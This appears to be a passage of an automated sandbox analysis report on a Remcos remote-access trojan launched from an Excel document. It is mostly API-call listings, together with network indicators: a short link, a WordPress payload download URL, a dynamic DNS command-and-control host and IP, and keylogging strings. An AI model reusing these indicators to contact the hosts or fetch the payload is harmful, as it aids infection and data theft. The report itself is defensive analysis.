@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,
Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe Code function: 27_2_00412BEE wcscpy,wcscpy,wcscat,wcscat,wcscpy,wcscat,FindFirstFileW,wcscpy,RemoveDirectoryW,FindNextFileW,wcscat,RemoveDirectoryW,wcscpy,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,
Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe Code function: 34_2_00404C0A wcscmp,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,tolower,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,
Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe Code function: 34_2_0040751B Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,
Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe Code function: 34_2_00410586 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_t
Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe Code function: 34_2_0040728F Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,DeleteFileA,GetLastError,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,
Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe Code function: 34_2_0040477E _EH_prolog,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,socket,connect,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,_CxxThrowException,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QA
Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe Code function: 34_2_00403325 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindNextFileW,FindNextFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,
Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe Code function: 34_2_00412BEE wcscpy,wcscpy,wcscat,wcscat,wcscpy,wcscat,FindFirstFileW,wcscpy,RemoveDirectoryW,FindNextFileW,wcscat,RemoveDirectoryW,wcscpy,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,
Source: C:\Users\user\AppData\Local\Temp\sm.exe Code function: 18_2_00403C4A ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,ShellExecuteW,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ,?substr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE?AV12@II@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,GetLogicalDriveStringsA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z,?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$ch
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini

                Software Vulnerabilities:

                Document exploit detected (process start blacklist hit)
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe
                Source: C:\Users\user\AppData\Local\Temp\sm.exe Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h
                Source: global traffic DNS query: name: cutt.ly
                Source: global traffic TCP traffic: 192.168.2.22:49167 -> 104.22.1.232:443

                Networking:

                Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
                Source: Traffic Snort IDS: 2021697 ET TROJAN EXE Download Request To Wordpress Folder Likely Malicious 192.168.2.22:49169 -> 83.172.144.37:80
                Uses dynamic DNS services
                Source: unknown DNS query: name: blessings2021.ddns.net
                Source: global traffic TCP traffic: 192.168.2.22:49170 -> 185.244.30.19:2021
                Source: global traffic HTTP traffic detected: GET /wp-content/themes/index/Shipppy.exe HTTP/1.1 Host: bighoreca.nl Connection: Keep-Alive
                Source: Joe Sandbox View IP Address: 185.244.30.19
                Source: Joe Sandbox View IP Address: 104.22.1.232
                Source: Joe Sandbox View ASN Name: DAVID_CRAIGGG
                Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS
                Source: Joe Sandbox View JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
                Source: C:\Users\user\AppData\Local\Temp\sm.exe Code function: 18_2_00403473
                Source: powershell.exe, 00000007.00000002.2127799800.000000001CC00000.00000002.00000001.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
                Source: powershell.exe, 00000007.00000002.2126041988.000000001B830000.00000004.00000001.sdmp String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                Source: unknown DNS traffic detected: queries for: cutt.ly
                Source: powershell.exe, 00000007.00000002.2123090513.00000000035BE000.00000004.00000001.sdmpString found in binary or memory: https://cutt.ly/mjfU5y0PE
                Source: powershell.exe, 00000007.00000003.2116774596.000000001D062000.00000004.00000001.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
                Source: powershell.exe, 00000007.00000002.2128219101.000000001CFE0000.00000004.00000001.sdmpString found in binary or memory: https://rca.e-szigno.hu/ocsp0-
                Source: powershell.exe, 00000007.00000002.2123254821.00000000036CA000.00000004.00000001.sdmpString found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
                Source: powershell.exe, 00000007.00000003.2116774596.000000001D062000.00000004.00000001.sdmpString found in binary or memory: https://secure.a-cert.at/cgi-bin/a-cert-advanced.cgi0
                Source: powershell.exe, 00000007.00000002.2126041988.000000001B830000.00000004.00000001.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                Source: powershell.exe, 00000007.00000003.2116803400.000000001D00E000.00000004.00000001.sdmpString found in binary or memory: https://www.catcert.net/verarrel
                Source: powershell.exe, 00000007.00000003.2116803400.000000001D00E000.00000004.00000001.sdmpString found in binary or memory: https://www.catcert.net/verarrel05
                Source: powershell.exe, 00000007.00000003.2116803400.000000001D00E000.00000004.00000001.sdmpString found in binary or memory: https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0
                Source: powershell.exe, 00000007.00000003.2116803400.000000001D00E000.00000004.00000001.sdmpString found in binary or memory: https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0E
                Source: powershell.exe, 00000007.00000002.2119396182.000000000041C000.00000004.00000020.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                Source: powershell.exe, 00000007.00000002.2123254821.00000000036CA000.00000004.00000001.sdmpString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-112763434-1
                Source: powershell.exe, 00000007.00000003.2116793159.000000001B91B000.00000004.00000001.sdmpString found in binary or memory: https://www.netlock.hu/docs/
                Source: powershell.exe, 00000007.00000003.2116793159.000000001B91B000.00000004.00000001.sdmpString found in binary or memory: https://www.netlock.net/docs
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
                Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443

                Key, Mouse, Clipboard, Microphone and Screen Capturing:

                Contains functionality to capture and log keystrokes
                Source: C:\Users\user\AppData\Local\Temp\sm.exe | Code function: [Esc]
                Source: C:\Users\user\AppData\Local\Temp\sm.exe | Code function: [Enter]
                Source: C:\Users\user\AppData\Local\Temp\sm.exe | Code function: [Tab]
                Source: C:\Users\user\AppData\Local\Temp\sm.exe | Code function: [Down]
